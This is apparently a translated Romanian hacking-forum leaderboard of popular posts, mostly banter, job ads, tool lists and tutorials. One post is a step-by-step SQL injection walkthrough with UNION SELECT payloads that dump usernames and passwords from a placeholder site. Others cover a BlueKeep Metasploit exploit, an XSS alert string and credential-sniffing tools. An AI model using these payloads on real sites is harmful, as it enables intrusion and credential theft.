Leaderboard


Popular Content

Showing content with the highest reputation since 08/17/19 in all areas

  1. 3 points
    That's it, brother, you've hit him over the head with Google, that was his last post; it reminds me of the forum's good old days, such nostalgia. Cheats for samp and Puterea dragostei are not compatible with the profile of a craftsman skilled in web vulnerabilities, from my point of view; I think we can agree on that statement. You have to work on the mindset first and then on the knowledge. What's the point of using some vectors without even knowing what they do, or how you can exploit the vulnerability further? It doesn't help you at all, you don't prove anything; I too can type those into an input and have no idea what to do next. You can't be eligible for a bug bounty because you won't know how to fix it or demonstrate what you can do with it.
  2. 3 points
    A powerful small guide to deal with Cross-Site Scripting in web applications bug hunting and security assessments Download Link : https://www.pdfdrive.com/xss-cheat-sheet-d158319463.html
  3. 3 points
    I did something like this for Shellcode compiler, but I don't know if my method is the most suitable. In principle you should use some tokens (e.g. special characters) and do what you need to do depending on them. I don't know how to explain how it works, but you can find tutorials on this and even implementations of (basic) C compilers and probably of other languages. What I did was define a "state machine". My idea is simple: I am in state "x" (for example the neutral state, in which I wait for something useful, such as a function declaration or a function call). Then I read character by character, depending on my state. In my language you can define a function using "function function_name(parameters)", and I read only alphanumeric characters up to another character. If the word is "function", it means the user wants to declare a function and I move to the function-declaration reading state. If it is something else, I expect them to want to call a function and I move to that state. For a function declaration I expect a space to follow (or several, or tabs, depending on how permissive you want to be). If there are none, bang, error. If there are, I move to the state of reading the function name (alphanumeric) until I encounter the "(" character, which indicates that the parameters follow. And so on... I don't know which solution would be better; my solution seemed simple to me, but it may not be the best or the most practical. If you want to use it, take a sheet of paper and a pen and draw the state machine: how you want it to look and which characters lead to which other states. PS: When transitioning between states you have to save some data, such as the name of a function.
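The character-by-character state machine described in the post above, as an added example that is not part of the original post and not the Shellcode compiler's own code. The state names, the `;` separator, the `_` in identifiers and the comma-split parameter list are assumptions made for illustration.

```python
from enum import Enum, auto


class State(Enum):
    NEUTRAL = auto()     # waiting for something useful: a declaration or a call
    WORD = auto()        # reading the first alphanumeric word
    DECL_SPACE = auto()  # saw "function": consuming the mandatory whitespace
    DECL_NAME = auto()   # reading the declared function's name up to "("
    PARAMS = auto()      # reading parameters up to ")"


class ParseError(ValueError):
    pass


def is_ident(ch):
    # The post says "alphanumeric"; "_" is accepted as well (assumption).
    return ch.isalnum() or ch == "_"


def parse(source):
    """Return [(kind, name, params)] where kind is "declare" or "call"."""
    state = State.NEUTRAL
    word = name = kind = params = ""  # data saved across state transitions
    found = []
    for pos, ch in enumerate(source):
        if state is State.NEUTRAL:
            if ch.isspace() or ch == ";":  # ";" as a separator is an assumption
                continue
            if not is_ident(ch):
                raise ParseError(f"unexpected {ch!r} at offset {pos}")
            word, state = ch, State.WORD
        elif state is State.WORD:
            if is_ident(ch):
                word += ch
            elif word == "function":
                # A declaration must be followed by whitespace, otherwise error.
                if not ch.isspace():
                    raise ParseError(f"whitespace required after 'function' at offset {pos}")
                state = State.DECL_SPACE
            elif ch == "(":
                # Any other word followed by "(" is treated as a call.
                kind, name, params, state = "call", word, "", State.PARAMS
            else:
                raise ParseError(f"expected '(' after {word!r} at offset {pos}")
        elif state is State.DECL_SPACE:
            if ch.isspace():
                continue
            if not is_ident(ch):
                raise ParseError(f"function name expected at offset {pos}")
            name, state = ch, State.DECL_NAME
        elif state is State.DECL_NAME:
            if is_ident(ch):
                name += ch
            elif ch == "(":
                kind, params, state = "declare", "", State.PARAMS
            else:
                raise ParseError(f"expected '(' after name {name!r} at offset {pos}")
        elif state is State.PARAMS:
            if ch == ")":
                # Simplification: parameters are split on commas, so string
                # literals containing "," or ")" are not handled here.
                items = [p.strip() for p in params.split(",") if p.strip()]
                found.append((kind, name, items))
                state = State.NEUTRAL
            else:
                params += ch
    if state is not State.NEUTRAL:
        raise ParseError("unexpected end of input")
    return found


if __name__ == "__main__":
    print(parse("function add(a, b) puts(x);"))
```
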
  4. 2 points
  5. 2 points
    Hi, in this tutorial I will show how we can make a ChatRoom (hosting included).
    Step 1 - Create an account on Repl.It (we can also log in with Gmail). I have an account made specially for tutorials on this forum. Link: https://repl.it/
    Step 2 - Create a Node.js repl and name it "server" (or whatever name we want).
    Step 3 - Besides index.js, create 2 files named: package-lock.json; package.json.
    Step 4 - In index.js, copy-paste the following code: https://pastebin.com/pfNEcACv
    Step 5 - In package-lock.json, copy-paste the following code: https://pastebin.com/2dRvEwvt
    Step 6 - In package.json, copy-paste the following code: https://pastebin.com/Fjg073BQ
    Step 7 - Run our repl, wait for it to install everything that needs installing, and after it finishes copy the link of our repl (we will need it later):
    Step 8 - Create another Node.js repl and name it "ChatRoom" (or whatever name we want).
    Step 9 - Besides index.js, create 2 files named: package-lock.json; package.json.
    Step 10 - In index.js, copy-paste the following code: https://pastebin.com/a5j9MPNa On code line 4, where it says: var socket = io("Link"); replace "link" with the link of the repl we made earlier (the repl named server, or whatever name you gave it).
    Step 11 - In package-lock.json, copy-paste the following code: https://pastebin.com/sABUuGCB
    Step 12 - In package.json, copy-paste the following code: https://pastebin.com/xtgv9pMr
    DONE. RUN IT AND OPEN THE LINK OF THE "CHATROOM" REPL, OR WHATEVER YOU NAMED IT, AND GIVE IT TO THE PERSON WE WANT TO COMMUNICATE WITH ON THAT CHATROOM.
    LINK TO THE CHATROOM I MADE FOR THIS TUTORIAL: https://chatroom.tutorialerepl.repl.run/
  6. 2 points
    IMEI NUMBER: *#06#
    SMS INFO: *#9998*746#
    TEST MODE: *#0*#
    SOFTWARE INFORMATION: *#1234#
    DIAGNOSTIC: *#*#4636#*#*
    HELP MENU: *#9998*4357#
    JAVA MENU: *#9998*5282#
    MEMORY STATUS: *#9998*636#
    FACTORY RESET: *#*#7780#*#*
    GPS TEST: *#*#1472365#*#*
    BATTERY CODE: *#0228#
    AUDIO TEST: *#0673#
    SERVICE MENU: *#0011#
    VIEW PHONE LOCK STATUS: *#7465625#
  7. 2 points
    You have the option to download the document if you upload another one. A kind of barter: you upload a random PDF and in exchange you receive the document you are interested in.
  8. 2 points
    How to Exploit BlueKeep Vulnerability with Metasploit
    Sep 10, 2019 • Razvan Ionescu, Stefan Bratescu, Cristin Sirbu
    In this article we show our approach for exploiting the RDP BlueKeep vulnerability using the recently proposed Metasploit module. We show how to obtain a Meterpreter shell on a vulnerable Windows 2008 R2 machine by adjusting the Metasploit module code (GROOMBASE and GROOMSIZE values) because the exploit does not currently work out-of-the-box. Further on, we explain the steps we took to make the module work properly on our target machine:
    • Background
    • Prerequisites
    • Installing the Bluekeep exploit module in Metasploit
    • Preparing the target machine
    • Adjusting the BlueKeep exploit
    • Running the exploit module
    • Conclusions
    1. Background
    BlueKeep is a critical Remote Code Execution vulnerability in Microsoft’s RDP service. Since the vulnerability is wormable, it has caught a great deal of attention from the security community, being in the same category as EternalBlue MS17-010 and Conficker MS08-067. You can read an in-depth analysis of the BlueKeep vulnerability on our blog post. A few days ago, a Metasploit contributor - zerosum0x0 - submitted a pull request to the framework containing an exploit module for BlueKeep (CVE-2019-0708). The Rapid7 team has also published an article about this exploit on their blog. As of now, the module is not yet integrated into the main Metasploit branch (it’s still a pull request) and it only targets Windows 2008 R2 and Windows 7 SP1, 64-bit versions. Furthermore, the module is now ranked as Manual since the user needs to provide additional information about the target, otherwise it risks crashing it with a BSOD.
    Full article: https://pentest-tools.com/blog/bluekeep-exploit-metasploit/
  9. 2 points
    Initial Metasploit Exploit Module for BlueKeep (CVE-2019-0708) by Brent Cook Sep 06, 2019 Today, Metasploit is releasing an initial public exploit module for CVE-2019-0708, also known as BlueKeep, as a pull request on Metasploit Framework. The initial PR of the exploit module targets 64-bit versions of Windows 7 and Windows 2008 R2. The module builds on proof-of-concept code from Metasploit contributor @zerosum0x0, who also contributed Metasploit’s BlueKeep scanner module and the scanner and exploit modules for EternalBlue. Metasploit’s exploit makes use of an improved general-purpose RDP protocol library, as well as enhanced RDP fingerprinting capabilities, both of which will benefit Metasploit users and contributors well beyond the context of BlueKeep scanning and exploitation. As an open-source project, one of Metasploit’s guiding principles is that knowledge is most powerful when shared. Democratic access to attacker capabilities, including exploits, is critical for defenders—particularly those who rely on open-source tooling to understand and effectively mitigate risk. Exploitation notes By default, Metasploit’s BlueKeep exploit only identifies the target operating system version and whether the target is likely to be vulnerable. The exploit does not currently support automatic targeting; it requires the user to manually specify target details before it will attempt further exploitation. If the module is interrupted during exploitation, or if the incorrect target is specified, the target will crash with a bluescreen. Users should also note that some elements of the exploit require knowledge of how Windows kernel memory is laid out, which varies depending on both OS version and the underlying host platform (virtual or physical); the user currently needs to specify this correctly to run the exploit successfully. 
Server versions of Windows also require a non-default configuration for successful exploitation—namely, changing a registry setting to enable audio sharing. This limitation may be removed in the future. One of the drivers in our releasing the exploit code today as a PR on Metasploit Framework is to enlist the help of the global developer and user community to test, verify, and extend reliability across target environments. As with many Metasploit exploits whose utility has endured over the years, we expect to continue refining the BlueKeep exploit over time. We look forward to working with the Metasploit community to add support for automatic targeting, improve reliability, and expand the range of possible targets. In addition to PoC contributors @zerosum0x0 and @ryHanson, we owe many (many!) enthusiastic thanks to @TheColonial, @rickoates (https://twitter.com/rickoates), @zeroSteiner, @TomSellers, @wvu, @bwatters, @sinn3r, and the rest of the Metasploit development team for their invaluable assistance and leadership on development (which included an extensive port of zerosum0x0’s original Python exploit code to Ruby), testing, and integration. New folks interested in joining the list of testers and contributors can get started here! Detection and solution notes Defenders may want to note that BlueKeep exploitation looks similar to a BlueKeep vulnerability scanner at the network level. If your network IDS/IPS is already able to detect the scanner sequence, it almost certainly detects the exploit as well. For host-based IDS/IPS users, the kernel shellcode loads a child process to the Windows process spoolsv.exe by default, which is a similar indicator of compromise to exploits such as EternalBlue (MS17-010). 
All that said, there's one important caveat for Metasploit payload detection tools, such as those that alert on generic meterpreter payloads in network traffic: If an intrusion prevention system interrupts in-progress BlueKeep exploitation simply because it detects a payload signature against an unpatched target, breaking that network connection will likely crash the target as a side effect, since the exploit code is actually triggered by a network disconnect. Because of this, users are urged to test their IPS against this Metasploit module once the PR is merged into the Framework master branch. While specific defenses and detection against this particular exploit are useful, newer RDP vulnerabilities in the ‘DejaBlue’ family have underscored this protocol in general as a risk. The protocol’s inherent complexity suggests that the known bugs today will not be the last, particularly since exploit developers and researchers now have a more nuanced understanding of RDP and its weaknesses. Continued exploitation is likely, as is increased exploit sophistication. If you still need to use RDP in your environment, then in addition to standard recommendations such as enabling Network Level Authentication, tightening your network access controls will also go a long way toward mitigating future vulnerabilities. The broader security community has emphasized the importance and urgency of patching against CVE-2019-0708. We echo this advice: Rapid7 Labs has previously written about the uptick in malicious RDP activity they have observed since the publication of the BlueKeep vulnerability. Rapid7 Labs has not observed an increased barrage of incoming attacks against RDP past the initial uptick in malicious activity after BlueKeep was published. 
The chart above looks similar to the Labs team’s previous report on RDP and while activity is at elevated levels when compared to a year ago, overall opportunistic attacker activity is much lower than we expected to see by this point in the post-vulnerability release cycle. Our research partners at BinaryEdge have up-to-date scan results for systems vulnerable to BlueKeep and have indicated they are still observing just over 1 million exposed nodes. For profiles of attacker activity and detailed recommendations on defending against BlueKeep exploitation, see Rapid7’s previous analysis here. About Metasploit and Rapid7 Metasploit is a collaboration between Rapid7 and the open-source community. Together, we empower defenders with world-class offensive security content and the ability to understand, exploit, and share vulnerabilities. For more information, see https://www.metasploit.com. Source: https://blog.rapid7.com/2019/09/06/initial-metasploit-exploit-module-for-bluekeep-cve-2019-0708/amp/?__twitter_impression=true
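The host-based indicator named in the detection notes above (a child process started under spoolsv.exe), checked over process-creation events. This is an added example, not code from Rapid7 or Metasploit; the JSON-lines layout modelled on Sysmon Event ID 1 fields, the constructed sample events and the `ALLOWED_CHILDREN` baseline are assumptions to adapt to your own telemetry.

```python
import json
import ntpath  # parses Windows paths correctly on any platform

# Children of spoolsv.exe treated as expected in this environment.
# Assumption: build this baseline from your own fleet before alerting on it.
ALLOWED_CHILDREN = {"werfault.exe"}

# Constructed sample events (one JSON object per line), not real telemetry.
SAMPLE_EVENTS = r"""
{"EventID": 1, "UtcTime": "2019-09-10 10:00:01", "Computer": "srv01", "ParentImage": "C:\\Windows\\System32\\services.exe", "Image": "C:\\Windows\\System32\\spoolsv.exe", "User": "NT AUTHORITY\\SYSTEM"}
{"EventID": 1, "UtcTime": "2019-09-10 10:07:42", "Computer": "srv01", "ParentImage": "C:\\Windows\\System32\\spoolsv.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "User": "NT AUTHORITY\\SYSTEM"}
{"EventID": 1, "UtcTime": "2019-09-10 10:08:10", "Computer": "ws17", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\notepad.exe", "User": "CORP\\alice"}
{"EventID": 3, "UtcTime": "2019-09-10 10:08:11", "Computer": "srv01", "Image": "C:\\Windows\\System32\\spoolsv.exe", "DestinationPort": 4443}
{"EventID": 1, "UtcTime": "2019-09-10 10:09:30", "Computer": "srv02", "ParentImage": "C:\\WINDOWS\\SYSTEM32\\SPOOLSV.EXE", "Image": "C:\\Windows\\System32\\rundll32.exe", "User": "NT AUTHORITY\\SYSTEM"}
{"EventID": 1, "UtcTime": "2019-09-10 10:10:05", "Computer": "srv02", "ParentImage": "C:\\Windows\\System32\\spoolsv.exe", "Image": "C:\\Windows\\System32\\WerFault.exe", "User": "NT AUTHORITY\\SYSTEM"}
this line is not JSON and must be skipped
"""


def spoolsv_child_alerts(lines, allowed=ALLOWED_CHILDREN):
    """Return one alert per process-creation event whose parent is spoolsv.exe
    and whose image is not in the allowed baseline."""
    alerts = []
    for line in lines.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # tolerate truncated or foreign log lines
        if not isinstance(event, dict) or event.get("EventID") != 1:
            continue  # only process-creation events carry ParentImage
        # Windows paths are case-insensitive, so compare lowercased basenames.
        parent = ntpath.basename(event.get("ParentImage", "")).lower()
        child = ntpath.basename(event.get("Image", "")).lower()
        if parent == "spoolsv.exe" and child not in allowed:
            alerts.append({
                "time": event.get("UtcTime"),
                "host": event.get("Computer"),
                "child": child,
                "user": event.get("User"),
            })
    return alerts


if __name__ == "__main__":
    for alert in spoolsv_child_alerts(SAMPLE_EVENTS):
        print("ALERT spoolsv.exe spawned", alert["child"], "on", alert["host"], "at", alert["time"])
```
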
  10. 2 points
    You can piss on this exploit, it's good for nothing.
  11. 2 points
    Salary: 2500 euro
    Job Title: Firewall Engineer
    Location: Bucharest, Romania
    Job Position: 12 Contract FTE
    Start Date: Immediate
    Job Description: Your Responsibility as Firewall engineer
    As a subject matter expert you will:
    • Execute tasks assigned, autonomously
    • Be a team member in the squads
    • Be pro-active, quality driven
    • Solve incidents
    • Prepare and implement changes
    • Automate (in Ansible and ServiceNow) a number of tasks (example: A request to create Jira project in service-now will create a project in JIRA) with Ansible
    • Update documentation/procedures
    Your Experience
    • Worked on tasks related to changes, automation and any other tasks decided by the business analysts / product owner
    • Understand Firewall rules, data traffic, routing
    • Supported various migrations/updates and upgrade activities in Networks
    • Understand the VMware concept and monitoring
    • Solved operational tickets w.r.t. Network traffic, Firewall rules end-2-end connectivity
    • Worked with Ansible
    • Worked in DevOps, Scrum, Agile
    • Understand ITIL
    • Worked with VMware, Linux, Windows environment
    • Implement best practice
    • Understand Security. Understand authentication, authorization
    • Understand, created and implemented Network designs
    • Knowledge of security scans and (cyber threat) risk assessments
    • Knowledge of IDS/IPS, WAF and content scanning
    Your profile:
    • Academic degree (preferably Technology)
    • Expert knowledge and understanding of CISCO network architecture and PALO ALTO
    • Expert knowledge in understanding network traffic, end-2-end connectivity and rules involved
    • Expert knowledge of network connectivity, concepts, devices, roles.
    • Expert knowledge on DHCP/Proxy/PEP/EOD/IPNS/DNS, load balancing
    • Expert knowledge of Network protocols like TCP/IP, HTTP/S, FTP, VPN technology, SSL, routing and switching.
    • Knowledge on LDAP/eDir
    • Strong scripting knowledge - Ansible (GIT).
    • Analytical and good problem-solving skills
    • Possess a positive and proactive ('can do') attitude
    • Customer focused and service minded
    • Work independently while remaining a team player
    • Presentation skills and ability to work in a global team and communicate effectively with cross-functional team members and customers
    • Zabbix knowledge (monitoring tool)
  12. 2 points
    Let's say you have a site from the "Big Bounty" program and you want to try a MySQL attack. I will use the following fictional site:
    https://victimescu.com/index.php?id=5
    To check whether our site returns an SQL error, we have to put the (') sign after the parameter .php?.id=5. If it is vulnerable, it will print the following:
    You have an error in your SQL syntax; check the manual that corresponds to your….. Continued
    If it is not vulnerable, our site will work normally. Next we have to go on with the (ORDER BY ) parameter, as in the step above. - This is used to check how many columns are on that page in the MySQL database.
    https://victimescu.com/index.php?id=5 ORDER BY 5 -
    If our page works perfectly normally, it means there are more than 5 columns present in the database. We try increasing the number by 10.
    https://victimescu.com/index.php?id=1 ORDER BY 15-
    Let's say that now the error indicating the number of columns present appears.
    Unknown column ’10’ in ‘order clause’
    Let's say that on our fictional site there are 9 columns present. Now we continue with just the (UNION SELECT) parameter.
    https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4,5,6,7,8,9
    Next, 2 numbers should appear that indicate where we do the injection.
    -------------------------------------------------
    One of the 2 numbers will be bold.
    -------------------------------------------------
    Let's say the 2 numbers are 5 and 3, and the one that indicates the database or column where the injection must be done is 5.
    https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact (table_name),6,7 from information_schema.tables
    This command helps us see what is in this database.
    CHARACTER_SETS,CLIENT_STATISTICS,COLUMNS
    Next, to extract more things, we write the following command:
    https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact (column_name),6,7 from information_schema.columns where table_schema=database()-
    Next we will see: -users -passwords -emails -etc
    https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact(username,0x3a,password),67 from database-
    This command was used to find out the password for the panel.
    -------------------------------------------------
    Often the password will be in MD5 format
    -------------------------------------------------
    That was the tutorial and I hope it will be used for good purposes.
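Why the `id` parameter in the tutorial above is injectable, and the fix, shown side by side. This is an added example, not part of the original post: it uses Python with an in-memory SQLite database in place of the tutorial's PHP/MySQL site so that it runs offline, and the `articles` table, the function names and the three-column probe are constructed for illustration.

```python
import re
import sqlite3

# A numeric id is the only thing this endpoint should ever accept.
ID_PATTERN = re.compile(r"[0-9]{1,9}")

# The tutorial's three probe shapes, adapted to the constructed 3-column table.
PROBES = ["5'", "5 ORDER BY 15", "5 UNION SELECT 1,2,3"]


def make_db():
    """Constructed sample data standing in for the site's database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO articles VALUES (5, 'Hello', 'First post');
        INSERT INTO articles VALUES (6, 'Second', 'Another post');
    """)
    return db


def page_vulnerable(db, raw_id):
    """BEFORE: the request value is pasted into the SQL text, so it is parsed
    as SQL, and database errors are echoed back to the client."""
    query = "SELECT id, title, body FROM articles WHERE id = " + raw_id
    try:
        return 200, db.execute(query).fetchall()
    except sqlite3.Error as exc:
        return 500, str(exc)  # error text reveals the query structure


def page_hardened(db, raw_id):
    """AFTER: validate the type, bind the value as a parameter, and never
    return database error text to the client."""
    if not ID_PATTERN.fullmatch(raw_id):
        return 400, "invalid id"
    try:
        rows = db.execute(
            "SELECT id, title, body FROM articles WHERE id = ?",
            (int(raw_id),),  # bound value: always data, never SQL syntax
        ).fetchall()
    except sqlite3.Error:
        return 500, "internal error"  # log details server-side instead
    return (200, rows) if rows else (404, "not found")


def compare(db):
    """Run every probe through both handlers and return the status codes."""
    return {p: (page_vulnerable(db, p)[0], page_hardened(db, p)[0]) for p in PROBES}


if __name__ == "__main__":
    database = make_db()
    for probe, (before, after) in compare(database).items():
        print(f"{probe!r:28} vulnerable={before} hardened={after}")
```

The quote and ORDER BY probes make the vulnerable handler return database error text, and the UNION probe adds an attacker-shaped row to its result; the hardened handler answers all three with the same 400.
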
  13. 2 points
    Wow, someone taught me this (also from here, but I no longer remember the nick) about 5-6 years ago, I think :-)) (it was back in the rstcenter days...) Very good tutorial. I'll look on my PC because I had some SQLi syntaxes, and I'll post them here too.
  14. 2 points
    So what Lenovo do you have? I have a ThinkPad and I think it is the best.
  15. 2 points
    https://i.imgur.com/FmDymVR.jpg
  16. 2 points
    If retards stop signing up here, the forum dies completely
  17. 1 point
    Yes noob, please provide a step by step tutorial for PRO haxors!!!
  18. 1 point
    You explained it nicely, congratulations and welcome. Try to post some better content and nobody will say anything anymore. GOOD LUCK!
  19. 1 point
    If you want to share code, you can use GitHub, which everyone uses. You no longer need to write a tutorial for every project, nor keep your code dumped on sites like pastebin. I'll give you an introductory tutorial on git & GitHub if you want.
  20. 1 point
    If you wanted to shut them up, you would have explained in a professional manner what c3m3d3 asked you above, and come with the fix for that "vulnerability" too, not squabbled with them like an old woman at the corner of the apartment block. With arrogance you achieve nothing without a solid background behind you; now everyone will take the piss out of you.
  21. 1 point
  22. 1 point
    Nobody is helping you + maintenance
  23. 1 point
  24. 1 point
    Are you competing with OKQL? >download a book from scribd >gives a scribd link I think he wants a FileList invite https://www84.zippyshare.com/v/jOTSdyzx/file.html @lauryca
  25. 1 point
    Wouldn't it be better to change that "kkt" font and post in the right category? What budget do you have?
  26. 1 point
    NetRipper is a post exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption. https://github.com/NytroRST/NetRipper
  27. 1 point
    BetterCAP − BetterCAP is a powerful, flexible and portable tool created to perform various types of MITM attacks against a network, manipulate HTTP, HTTPS and TCP traffic in real-time, sniff for credentials, and much more. DOWNLOAD: https://www.bettercap.org/installation/ Wireshark − It is one of the most widely known and used packet sniffers. It offers a tremendous number of features designed to assist in the dissection and analysis of traffic. DOWNLOAD: https://www.wireshark.org/download.html Tcpdump − It is a well-known command-line packet analyzer. It provides the ability to intercept and observe TCP/IP and other packets during transmission over the network. DOWNLOAD: www.tcpdump.org. MSN Sniffer − It is a sniffing utility specifically designed for sniffing traffic generated by the MSN Messenger application. DOWNLOAD:http://www.msnsniffer.com/ EtherApe − It is a Linux/Unix tool designed to display graphically a system's incoming and outgoing connections. DOWNLOAD: https://etherape.sourceforge.io/ EDITED: NetRipper is a post exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption. DOWNLOAD: https://github.com/NytroRST/NetRipper THANKS TO @Nytro
  28. 1 point
    Your idea is OK, but still, you bought a domain. In your place I would try to do something more creative than a review site for other hosts. Try to make something "cooler" that you enjoy doing and that also gives you the chance to earn something.
  29. 1 point
    Life is too short to bother with such small and meaningless things like a laptop. Buy an Acer and find perfection in imperfection!!!
  30. 1 point
    This is an interesting thing. I want to write a more detailed tutorial on the forum about how it is exploited
  31. 1 point
    I thank the guys, but I already have FileList. I would like IpTorrents. Thank you!
  32. 1 point
    Man, how many times do I have to tell you that it's super irrelevant which framework you use? In reality you can hardly notice the performance difference between Angular / React / Vue unless you have a heavy application; all this crap exists because in some of them you can have different architectures that different teams are more comfortable with and can be more productive in. Angular is generally used by those coming from Java who want to feel cool with types on the front-end. Vue is generally used by those who tried to learn React and failed, and who throw hate at corporations because it's made by a single person. React is cool and is used by those who are sure of themselves and know JavaScript, but they all do the same crap. In this whole platform of yours that you want to build, the biggest problem shouldn't be which technology you develop it in but how you sell it. I developed some B2B applications at a company that were total crap, trivial, but they were sold to Facebook and generated millions in profit because the marketing people knew how to do their job. It's more important to wrap the shit in a pretty bag than for your application to actually do something. Hell, in the IT industry in general it's more important to know how to talk than to have technical skills. Get to work and learn how to bullshit your way around the system. Learn whose ass to kiss, when and where, and you'll no longer have to think about which frameworks to choose. Don't you notice that in Silicon Valley the best paid are not the programmers but the managers?
  33. 1 point
  34. 1 point
    ctf-tools

    This is a collection of setup scripts to create an install of various security research tools. Of course, this isn't a hard problem, but it's really nice to have them in one place that's easily deployable to new machines and so forth.

    Installers for the following tools are included:

    | Category | Tool | Description |
    |----------|------|-------------|
    | binary | afl | State-of-the-art fuzzer. |
    | binary | angr | Next-generation binary analysis engine from Shellphish. |
    | binary | barf | Binary Analysis and Reverse-engineering Framework. |
    | binary | bindead | A static analysis tool for binaries. |
    | binary | checksec | Check binary hardening settings. |
    | binary | codereason | Semantic Binary Code Analysis Framework. |
    | binary | crosstool-ng | Cross-compilers and cross-architecture tools. |
    | binary | cross2 | A set of cross-compilation tools from a Japanese book on C. |
    | binary | elfkickers | A set of utilities for working with ELF files. |
    | binary | elfparser | Quickly determine the capabilities of an ELF binary through static analysis. |
    | binary | evilize | Tool to create MD5 colliding binaries |
    | binary | gdb | Up-to-date gdb with python2 bindings. |
    | binary | gef | Enhanced environment for gdb. |
    | binary | hongfuzz | A general-purpose, easy-to-use fuzzer with interesting analysis options. |
    | binary | libheap | gdb python library for examining the glibc heap (ptmalloc) |
    | binary | panda | Platform for Architecture-Neutral Dynamic Analysis. |
    | binary | pathgrind | Path-based, symbolically-assisted fuzzer. |
    | binary | peda | Enhanced environment for gdb. |
    | binary | preeny | A collection of helpful preloads (compiled for many architectures!). |
    | binary | pwndbg | Enhanced environment for gdb. Especially for pwning. |
    | binary | pwntools | Useful CTF utilities. |
    | binary | python-pin | Python bindings for pin. |
    | binary | qemu | Latest version of qemu! |
    | binary | qira | Parallel, timeless debugger. |
    | binary | radare2 | Some crazy thing crowell likes. |
    | binary | ropper | Another gadget finder. |
    | binary | rp++ | Another gadget finder. |
    | binary | shellnoob | Shellcode writing helper. |
    | binary | shellsploit | Shellcode development kit. |
    | binary | snowman | Cross-architecture decompiler. |
    | binary | taintgrind | A valgrind taint analysis tool. |
    | binary | villoc | Visualization of heap operations. |
    | binary | virtualsocket | A nice library to interact with binaries. |
    | binary | wcc | The Witchcraft Compiler Collection is a collection of compilation tools to perform binary black magic on the GNU/Linux and other POSIX platforms. |
    | binary | xrop | Gadget finder. |
    | forensics | binwalk | Firmware (and arbitrary file) analysis tool. |
    | forensics | dislocker | Tool for reading Bitlocker encrypted partitions. |
    | forensics | exetractor | Unpacker for packed Python executables. Supports PyInstaller and py2exe. |
    | forensics | firmware-mod-kit | Tools for firmware packing/unpacking. |
    | forensics | pdf-parser | Tool for digging in PDF files |
    | forensics | peepdf | Powerful Python tool to analyze PDF documents. |
    | forensics | scrdec | A decoder for encoded Windows Scripts. |
    | forensics | testdisk | Testdisk and photorec for file recovery. |
    | crypto | cribdrag | Interactive crib dragging tool (for crypto). |
    | crypto | foresight | A tool for predicting the output of random number generators. To run, launch "foresee". |
    | crypto | featherduster | An automated, modular cryptanalysis tool. |
    | crypto | hashkill | Hash cracker. |
    | crypto | hashpump | A tool for performing hash length extension attacks. |
    | crypto | hashpump-partialhash | Hashpump, supporting partially-unknown hashes. |
    | crypto | hash-identifier | Simple hash algorithm identifier. |
    | crypto | littleblackbox | Database of private SSL/SSH keys for embedded devices. |
    | crypto | msieve | Msieve is a C library implementing a suite of algorithms to factor large integers. |
    | crypto | pemcrack | SSL PEM file cracker. |
    | crypto | pkcrack | PkZip encryption cracker. |
    | crypto | python-paddingoracle | Padding oracle attack automation. |
    | crypto | reveng | CRC finder. |
    | crypto | ssh_decoder | A tool for decoding ssh traffic. You will need ruby1.8 from https://launchpad.net/~brightbox/+archive/ubuntu/ruby-ng to run this. Run with ssh_decoder --help for help, as running it with no arguments causes it to crash. |
    | crypto | sslsplit | SSL/TLS MITM. |
    | crypto | xortool | XOR analysis tool. |
    | crypto | yafu | Automated integer factorization. |
    | web | burpsuite | Web proxy to do naughty web stuff. |
    | web | commix | Command injection and exploitation tool. |
    | web | dirb | Web path scanner. |
    | web | dirsearch | Web path scanner. |
    | web | mitmproxy | CLI Web proxy and python library. |
    | web | sqlmap | SQL injection automation engine. |
    | web | subbrute | A DNS meta-query spider that enumerates DNS records, and subdomains. |
    | stego | sound-visualizer | Audio file visualization. |
    | stego | steganabara | Another image steganography solver. |
    | stego | stegdetect | Steganography detection/breaking tool. |
    | stego | stegsolve | Image steganography solver. |
    | stego | zsteg | detect stegano-hidden data in PNG & BMP. |
    | android | apktool | Dissect, dis-assemble, and re-pack Android APKs |
    | android | android-sdk | The android SDK (adb, emulator, etc). |
    | misc | z3 | Theorem prover from Microsoft Research. |
    | misc | jdgui | Java decompiler. |
    | misc | veles | Binary data analysis and visualization tool. |

    Source: https://github.com/zardus/ctf-tools
  35. 1 point
  36. 0 points
    You're a lost cause if, after I gave you a downvote, you started creating accounts to downvote me. Do something with your life
  37. 0 points
    Aha, and what does package-lock.json do? Come on, get to work and learn what the tools you use do. Can you really be pleased with yourselves in this state?
  38. -1 points
    Wouldn't it be better to mind your own life and stop sharing your ideas?
  39. -1 points
  40. -1 points
    < .I. > "<stim ca/ma-ta-i grasa=alert('testingboss suge pula')>"
  41. -1 points
    Why the insults?
  42. -1 points
    But in short, package.json offers an ez way to "track" the packages that are used in the application/program. " { "main": "index.js", "dependencies": { "socket.io-client": "2.1.1", "chalk": "2.4.1", "prompts": "1.2.0" } } " wow
  43. -1 points
    Hello, the MSM8974 is also known as the Qualcomm Snapdragon 800, pretty old SoC, but I made a tutorial for the exploit a while back, check it out: http://bit.do/e8GFr
  44. -2 points
    Why did the chicken cross the road?
  45. -2 points
  46. -2 points
    Download GTA 5 APK Mobile game on TutuApp now. It is already on Tutuapp 2019. Everyone, install it now.
  47. -3 points
    A real hacker